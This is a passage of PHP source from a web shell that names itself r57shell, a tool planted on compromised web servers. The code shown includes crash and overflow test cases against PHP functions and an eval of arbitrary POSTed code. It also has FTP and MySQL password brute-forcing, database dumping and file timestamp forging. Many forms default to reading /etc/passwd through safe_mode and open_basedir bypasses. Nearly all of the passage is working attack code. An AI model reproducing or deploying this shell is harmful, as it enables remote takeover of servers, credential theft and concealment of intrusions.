6064 $buff = str_repeat("\x41", 250);$get_EIP = "\x42\x42";$get_ESP = str_repeat("\x43", 100);$get_EBP = str_repeat("\x44", 100);ntuser_getuserlist($buff.$get_EIP.$get_ESP.$get_EBP);
6065
6066 break;
6067
6068 case 'dos34':
6069
6070 if (extension_loaded("bz2")){ $buff = str_repeat("a",1000); com_print_typeinfo($buff);}
6071
6072 break;
6073
6074 case 'dos35':
6075
6076 $a = str_repeat("/", 4199000); iconv(1, $a, 1);
6077
6078 break;
6079
6080 case 'dos36':
6081
6082 $a = str_repeat("/", 2991370); iconv_mime_decode_headers(0, 1, $a);
6083
6084 break;
6085
6086 case 'dos37':
6087
6088 $a = str_repeat("/", 3799000); iconv_mime_decode(1, 0, $a);
6089
6090 break;
6091
6092 case 'dos38':
6093
6094 $a = str_repeat("/", 9791999); iconv_strlen(1, $a);
6095
6096 break;
6097
6098}
6099
6100
6101
6102if ($_POST['cmd']=="php_eval"){
6103
6104 $eval = @str_replace("<?","",$_POST['php_eval']);
6105
6106 $eval = @str_replace("?>","",$eval);
6107
6108 @eval($eval);}
6109
6110
6111
6112if ($_POST['cmd']=="ftp_brute")
6113
6114 {
6115
6116 $suc = 0;
6117
6118 if($_POST['brute_method']=='passwd'){
6119
6120 foreach($users as $user)
6121
6122 {
6123
6124 $connection = @ftp_connect($ftp_server,$ftp_port,10);
6125
6126 if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
6127
6128 else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
6129
6130 @ftp_close($connection);
6131
6132 }
6133
6134 }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){
6135
6136 foreach($users as $user)
6137
6138 {
6139
6140 $connection = @ftp_connect($ftp_server,$ftp_port,10);
6141
6142 if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; }
6143
6144 @ftp_close($connection);
6145
6146 }
6147
6148 }
6149
6150 echo "\r\n-------------------------------------\r\n";
6151
6152 $count = count($users);
6153
6154 if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
6155
6156 echo $lang[$language.'_text97'].$count."\r\n";
6157
6158 echo $lang[$language.'_text98'].$suc."\r\n";
6159
6160 }
6161
6162
6163
6164if ($_POST['cmd']=="db_brute")
6165
6166 {
6167
6168 $suc = 0;
6169
6170 if($_POST['brute_method']=='passwd'){
6171
6172 foreach($users as $user)
6173
6174 {
6175
6176 $sql = new my_sql();
6177
6178 $sql->db = $_POST['db'];
6179
6180 $sql->host = $_POST['db_server'];
6181
6182 $sql->port = $_POST['db_port'];
6183
6184 $sql->user = $user;
6185
6186 $sql->pass = $user;
6187
6188 if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; }
6189
6190 }
6191
6192 if(isset($_POST['reverse']))
6193
6194 {
6195
6196 foreach($users as $user)
6197
6198 {
6199
6200 $sql = new my_sql();
6201
6202 $sql->db = $_POST['db'];
6203
6204 $sql->host = $_POST['db_server'];
6205
6206 $sql->port = $_POST['db_port'];
6207
6208 $sql->user = $user;
6209
6210 $sql->pass = strrev($user);
6211
6212 if($sql->connect()) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; }
6213
6214 }
6215
6216 }
6217
6218 }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){
6219
6220 foreach($users as $user)
6221
6222 {
6223
6224 $sql = new my_sql();
6225
6226 $sql->db = $_POST['db'];
6227
6228 $sql->host = $_POST['db_server'];
6229
6230 $sql->port = $_POST['db_port'];
6231
6232 $sql->user = $_POST['mysql_l'];
6233
6234 $sql->pass = $user;
6235
6236 if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; }
6237
6238 }
6239
6240 }
6241
6242 echo "\r\n-------------------------------------\r\n";
6243
6244 $count = count($users);
6245
6246 if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
6247
6248 echo $lang[$language.'_text97'].$count."\r\n";
6249
6250 echo $lang[$language.'_text98'].$suc."\r\n";
6251
6252 }
6253
6254
6255
6256if ($_POST['cmd']=="mysql_dump")
6257
6258 {
6259
6260 if(isset($_POST['dif'])) { morewrite($_POST['dif_name'], "mysql_dump\r\n"); }
6261
6262 $sql = new my_sql();
6263
6264 $sql->db = $_POST['db'];
6265
6266 $sql->host = $_POST['db_server'];
6267
6268 $sql->port = $_POST['db_port'];
6269
6270 $sql->user = $_POST['mysql_l'];
6271
6272 $sql->pass = $_POST['mysql_p'];
6273
6274 $sql->base = $_POST['mysql_db'];
6275
6276 if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
6277
6278 else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
6279
6280 else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
6281
6282 else {
6283
6284 if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
6285
6286 else if(@is_writable($_POST['dif_name'])){ foreach($sql->dump as $v){ morewrite($_POST['dif_name'], $v."\r\n");} }
6287
6288 else { echo "[-] ERROR! Can't write in dump file"; }
6289
6290 }
6291
6292 }
6293
6294
6295
6296echo "</textarea></div>";
6297
6298echo "</b>";
6299
6300echo "</td></tr></table>";
6301
6302echo "<table width=100% cellpadding=0 cellspacing=0>";
6303
6304
6305
6306function div_title($title, $id)
6307
6308{
6309
6310 return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
6311
6312}
6313
6314function div($id)
6315
6316 {
6317
6318 if(isset($_COOKIE[$id]) && ($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">';
6319
6320 $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38','id39');
6321
6322 if(empty($_COOKIE[$id]) && @in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">';
6323
6324 return '<div id="'.$id.'">';
6325
6326 }
6327
6328
6329
6330if(!$safe_mode){
6331
6332echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
6333
6334echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
6335
6336echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6337
6338echo $te.'</div>'.$table_end1.$fe;
6339
6340}
6341
6342else{
6343
6344echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
6345
6346echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
6347
6348echo $te.'</div>'.$table_end1.$fe;
6349
6350}
6351
6352echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
6353
6354echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
6355
6356echo $te.'</div>'.$table_end1.$fe;
6357
6358
6359
6360if($safe_mode || $open_basedir){
6361
6362echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
6363
6364echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
6365
6366echo $te.'</div>'.$table_end1.$fe;
6367
6368}
6369
6370
6371
6372if($unix && @function_exists('touch')){
6373
6374echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts;
6375
6376echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($_SERVER["SCRIPT_FILENAME"])))
6377
6378.ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>"
6379
6380.ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));
6381
6382echo sr(15,"<b> or set Day".$arrow."</b>",
6383
6384'
6385
6386<select name="day" size="1">
6387
6388<option value="01">1</option>
6389
6390<option value="02">2</option>
6391
6392<option value="03">3</option>
6393
6394<option value="04">4</option>
6395
6396<option value="05">5</option>
6397
6398<option value="06">6</option>
6399
6400<option value="07">7</option>
6401
6402<option value="08">8</option>
6403
6404<option value="09">9</option>
6405
6406<option value="10">10</option>
6407
6408<option value="11">11</option>
6409
6410<option value="12">12</option>
6411
6412<option value="13">13</option>
6413
6414<option value="14">14</option>
6415
6416<option value="15">15</option>
6417
6418<option value="16">16</option>
6419
6420<option value="17">17</option>
6421
6422<option value="18">18</option>
6423
6424<option value="19">19</option>
6425
6426<option value="20">20</option>
6427
6428<option value="21">21</option>
6429
6430<option value="22">22</option>
6431
6432<option value="23">23</option>
6433
6434<option value="24">24</option>
6435
6436<option value="25">25</option>
6437
6438<option value="26">26</option>
6439
6440<option value="27">27</option>
6441
6442<option value="28">28</option>
6443
6444<option value="29">29</option>
6445
6446<option value="30">30</option>
6447
6448<option value="31">31</option>
6449
6450</select>'
6451
6452.ws(4)."<b>Month".$arrow."</b>"
6453
6454.'
6455
6456<select name="month" size="1">
6457
6458<option value="January">January</option>
6459
6460<option value="February">February</option>
6461
6462<option value="March">March</option>
6463
6464<option value="April">April</option>
6465
6466<option value="May">May</option>
6467
6468<option value="June">June</option>
6469
6470<option value="July">July</option>
6471
6472<option value="August">August</option>
6473
6474<option value="September">September</option>
6475
6476<option value="October">October</option>
6477
6478<option value="November">November</option>
6479
6480<option value="December">December</option>
6481
6482</select>'
6483
6484.ws(4)."<b>Year".$arrow."</b>"
6485
6486.'
6487
6488<select name="year" size="1">
6489
6490<option value="1998">1998</option>
6491
6492<option value="1999">1999</option>
6493
6494<option value="2000">2000</option>
6495
6496<option value="2001">2001</option>
6497
6498<option value="2002">2002</option>
6499
6500<option value="2003">2003</option>
6501
6502<option value="2004">2004</option>
6503
6504<option value="2005">2005</option>
6505
6506<option value="2006">2006</option>
6507
6508<option value="2006">2007</option>
6509
6510<option value="2006">2008</option>
6511
6512<option value="2006">2009</option>
6513
6514<option value="2006">2010</option>
6515
6516</select>'
6517
6518.ws(4)."<b>Hour".$arrow."</b>"
6519
6520.'
6521
6522<select name="chasi" size="1">
6523
6524<option value="01">01</option>
6525
6526<option value="02">02</option>
6527
6528<option value="03">03</option>
6529
6530<option value="04">04</option>
6531
6532<option value="05">05</option>
6533
6534<option value="06">06</option>
6535
6536<option value="07">07</option>
6537
6538<option value="08">08</option>
6539
6540<option value="09">09</option>
6541
6542<option value="10">10</option>
6543
6544<option value="11">11</option>
6545
6546<option value="12">12</option>
6547
6548<option value="13">13</option>
6549
6550<option value="14">14</option>
6551
6552<option value="15">15</option>
6553
6554<option value="16">16</option>
6555
6556<option value="17">17</option>
6557
6558<option value="18">18</option>
6559
6560<option value="19">19</option>
6561
6562<option value="20">20</option>
6563
6564<option value="21">21</option>
6565
6566<option value="22">22</option>
6567
6568<option value="23">23</option>
6569
6570<option value="24">24</option>
6571
6572</select>'
6573
6574.ws(4)."<b>Minute".$arrow."</b>"
6575
6576.'
6577
6578<select name="minutes" size="1">
6579
6580<option value="01">1</option>
6581
6582<option value="02">2</option>
6583
6584<option value="03">3</option>
6585
6586<option value="04">4</option>
6587
6588<option value="05">5</option>
6589
6590<option value="06">6</option>
6591
6592<option value="07">7</option>
6593
6594<option value="08">8</option>
6595
6596<option value="09">9</option>
6597
6598<option value="10">10</option>
6599
6600<option value="11">11</option>
6601
6602<option value="12">12</option>
6603
6604<option value="13">13</option>
6605
6606<option value="14">14</option>
6607
6608<option value="15">15</option>
6609
6610<option value="16">16</option>
6611
6612<option value="17">17</option>
6613
6614<option value="18">18</option>
6615
6616<option value="19">19</option>
6617
6618<option value="20">20</option>
6619
6620<option value="21">21</option>
6621
6622<option value="22">22</option>
6623
6624<option value="23">23</option>
6625
6626<option value="24">24</option>
6627
6628<option value="25">25</option>
6629
6630<option value="26">26</option>
6631
6632<option value="27">27</option>
6633
6634<option value="28">28</option>
6635
6636<option value="29">29</option>
6637
6638<option value="30">30</option>
6639
6640<option value="31">31</option>
6641
6642<option value="32">32</option>
6643
6644<option value="33">33</option>
6645
6646<option value="34">34</option>
6647
6648<option value="35">35</option>
6649
6650<option value="36">36</option>
6651
6652<option value="37">37</option>
6653
6654<option value="38">38</option>
6655
6656<option value="39">39</option>
6657
6658<option value="40">40</option>
6659
6660<option value="41">41</option>
6661
6662<option value="42">42</option>
6663
6664<option value="43">43</option>
6665
6666<option value="44">44</option>
6667
6668<option value="45">45</option>
6669
6670<option value="46">46</option>
6671
6672<option value="47">47</option>
6673
6674<option value="48">48</option>
6675
6676<option value="49">49</option>
6677
6678<option value="50">50</option>
6679
6680<option value="51">51</option>
6681
6682<option value="52">52</option>
6683
6684<option value="53">53</option>
6685
6686<option value="54">54</option>
6687
6688<option value="55">55</option>
6689
6690<option value="56">56</option>
6691
6692<option value="57">57</option>
6693
6694<option value="58">58</option>
6695
6696<option value="59">59</option>
6697
6698</select>'
6699
6700.ws(4)."<b>Second".$arrow."</b>"
6701
6702.'
6703
6704<select name="second" size="1">
6705
6706<option value="01">1</option>
6707
6708<option value="02">2</option>
6709
6710<option value="03">3</option>
6711
6712<option value="04">4</option>
6713
6714<option value="05">5</option>
6715
6716<option value="06">6</option>
6717
6718<option value="07">7</option>
6719
6720<option value="08">8</option>
6721
6722<option value="09">9</option>
6723
6724<option value="10">10</option>
6725
6726<option value="11">11</option>
6727
6728<option value="12">12</option>
6729
6730<option value="13">13</option>
6731
6732<option value="14">14</option>
6733
6734<option value="15">15</option>
6735
6736<option value="16">16</option>
6737
6738<option value="17">17</option>
6739
6740<option value="18">18</option>
6741
6742<option value="19">19</option>
6743
6744<option value="20">20</option>
6745
6746<option value="21">21</option>
6747
6748<option value="22">22</option>
6749
6750<option value="23">23</option>
6751
6752<option value="24">24</option>
6753
6754<option value="25">25</option>
6755
6756<option value="26">26</option>
6757
6758<option value="27">27</option>
6759
6760<option value="28">28</option>
6761
6762<option value="29">29</option>
6763
6764<option value="30">30</option>
6765
6766<option value="31">31</option>
6767
6768<option value="32">32</option>
6769
6770<option value="33">33</option>
6771
6772<option value="34">34</option>
6773
6774<option value="35">35</option>
6775
6776<option value="36">36</option>
6777
6778<option value="37">37</option>
6779
6780<option value="38">38</option>
6781
6782<option value="39">39</option>
6783
6784<option value="40">40</option>
6785
6786<option value="41">41</option>
6787
6788<option value="42">42</option>
6789
6790<option value="43">43</option>
6791
6792<option value="44">44</option>
6793
6794<option value="45">45</option>
6795
6796<option value="46">46</option>
6797
6798<option value="47">47</option>
6799
6800<option value="48">48</option>
6801
6802<option value="49">49</option>
6803
6804<option value="50">50</option>
6805
6806<option value="51">51</option>
6807
6808<option value="52">52</option>
6809
6810<option value="53">53</option>
6811
6812<option value="54">54</option>
6813
6814<option value="55">55</option>
6815
6816<option value="56">56</option>
6817
6818<option value="57">57</option>
6819
6820<option value="58">58</option>
6821
6822<option value="59">59</option>
6823
6824</select>'
6825
6826.in('hidden','cmd',0,'touch')
6827
6828.in('hidden','dir',0,$dir)
6829
6830.ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6831
6832echo $te.'</div>'.$table_end1.$fe;
6833
6834}
6835
6836
6837
6838$select='';
6839
6840if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";}
6841
6842if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";}
6843
6844if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";}
6845
6846if($unix && $select){
6847
6848echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts;
6849
6850echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($_SERVER["SCRIPT_FILENAME"]))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6851
6852echo $te.'</div>'.$table_end1.$fe;
6853
6854}
6855
6856
6857
6858if(!$safe_mode){
6859
6860$aliases2 = '';
6861
6862foreach ($aliases as $alias_name=>$alias_cmd)
6863
6864 {
6865
6866 $aliases2 .= "<option>$alias_name</option>";
6867
6868 }
6869
6870echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id7').$table_up2.div('id7').$ts;
6871
6872echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6873
6874echo $te.'</div>'.$table_end1.$fe;
6875
6876}
6877
6878
6879
6880echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id8').$table_up2.div('id8').$ts;
6881
6882echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
6883
6884echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )");
6885
6886echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
6887
6888echo $te.'</div>'.$table_end1.$fe;
6889
6890
6891
6892if(!$safe_mode && $unix){
6893
6894echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts;
6895
6896echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
6897
6898echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )");
6899
6900echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
6901
6902echo $te.'</div>'.$table_end1.$fe;
6903
6904}
6905
6906
6907
6908echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id10').$table_up2.$font;
6909
6910echo "<div align=center>".div('id10')."<textarea name=php_eval cols=100 rows=10>";
6911
6912echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");"));
6913
6914echo "</textarea>";
6915
6916echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
6917
6918echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
6919
6920echo "</div></div></font>";
6921
6922echo $table_end1.$fe;
6923
6924
6925
6926if($safe_mode || $open_basedir)
6927
6928{
6929
6930echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
6931
6932echo "<table class=table1 width=100% align=center>";
6933
6934echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6935
6936echo $te.'</div>'.$table_end1.$fe;
6937
6938}
6939
6940
6941
6942if(($safe_mode || $open_basedir) && $curl_on && @version_compare(@phpversion(),"5.2.0")<=0)
6943
6944{
6945
6946echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts;
6947
6948echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6949
6950echo $te.'</div>'.$table_end1.$fe;
6951
6952}
6953
6954
6955
6956if(($safe_mode || $open_basedir) && $mysql_on)
6957
6958{
6959
6960echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id13').$table_up2.div('id13').$ts;
6961
6962echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
6963
6964echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6965
6966echo $te.'</div>'.$table_end1.$fe;
6967
6968}
6969
6970
6971
6972if(($safe_mode || $open_basedir) && $mysqli_on)
6973
6974{
6975
6976echo $fs.$table_up1.div_title($lang[$language.'_text144'],'id40').$table_up2.div('id40').$ts;
6977
6978echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test19_md',15,(!empty($_POST['test19_md'])?($_POST['test19_md']):("mysqli"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test19_ml',15,(!empty($_POST['test19_ml'])?($_POST['test19_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text39'].$arrow."</b>".in('text','test19_mp',15,(!empty($_POST['test19_mp'])?($_POST['test19_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test19_port',15,(!empty($_POST['test19_port'])?($_POST['test19_port']):("3306"))));
6979
6980echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test19_file',96,(!empty($_POST['test19_file'])?($_POST['test19_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test19').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6981
6982echo $te.'</div>'.$table_end1.$fe;
6983
6984}
6985
6986
6987
6988if(($safe_mode || $open_basedir) && $mssql_on)
6989
6990{
6991
6992echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts;
6993
6994echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
6995
6996echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6997
6998echo $te.'</div>'.$table_end1.$fe;
6999
7000}
7001
7002
7003
7004
7005
7006if(($safe_mode || $open_basedir) && $unix && @function_exists('mb_send_mail') && @version_compare(@phpversion(),"5.2.0")<=0){
7007
7008echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;
7009
7010echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7011
7012echo $te.'</div>'.$table_end1.$fe;
7013
7014}
7015
7016
7017
7018if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_list') && @version_compare(@phpversion(),"5.2.0")<=0){
7019
7020echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id20').$table_up2.div('id20').$ts;
7021
7022echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7023
7024echo $te.'</div>'.$table_end1.$fe;
7025
7026}
7027
7028
7029
7030if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_body') && @version_compare(@phpversion(),"5.2.0")<=0){
7031
7032echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;
7033
7034echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7035
7036echo $te.'</div>'.$table_end1.$fe;
7037
7038}
7039
7040
7041
7042if(($safe_mode || $open_basedir) && @function_exists('copy') && @version_compare(@phpversion(),"5.2.0")<=0)
7043
7044{
7045
7046echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;
7047
7048echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
7049
7050echo sr(15,"<b>".$lang[$language.'_text117'].ws(2).$lang[$language.'_text60'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7051
7052echo $te.'</div>'.$table_end1.$fe;
7053
7054}
7055
7056
7057
7058if(($safe_mode || $open_basedir) && @function_exists('ini_restore') && @version_compare(@phpversion(),"5.2.0")<=0){
7059
7060echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;
7061
7062echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7063
7064echo $te.'</div>'.$table_end1.$fe;
7065
7066}
7067
7068
7069
7070if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.0.0")<0){
7071
7072echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;
7073
7074echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7075
7076echo $te.'</div>'.$table_end1.$fe;
7077
7078}
7079
7080
7081
7082if(($safe_mode || $open_basedir) && @function_exists('glob') && @version_compare(@phpversion(),"5.2.2")<=0){
7083
7084echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;
7085
7086echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test_global'])?($_POST['test_global']):($dir))).in('hidden','cmd',0,'safe_dir').in('hidden','glob',0,'glob').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7087
7088echo $te.'</div>'.$table_end1.$fe;
7089
7090}
7091
7092
7093
7094if(($safe_mode || $open_basedir) && @function_exists('realpath') && @version_compare(@phpversion(),"5.2.4")<=0){
7095
7096$select_n_rlph = "<select name='n_rlph'><option value=1>[ 1 ] (<<0,01 sec)</option><option value=2>[ 2 ] (<0,01 sec)</option>".
7097
7098"<option value=3 selected>[ 3 ] (<1 sec (default))</option>".
7099
7100"<option value=4>[ 4 ] (<10 sec)</option><option value=5>[ 5 ] (>100 sec (danger))</option><option value=6>[ 6 ] (>>100 sec (danger))</option></select>";
7101
7102echo $fs.$table_up1.div_title($lang[$language.'_text145'],'id41').$table_up2.div('id41').$ts;
7103
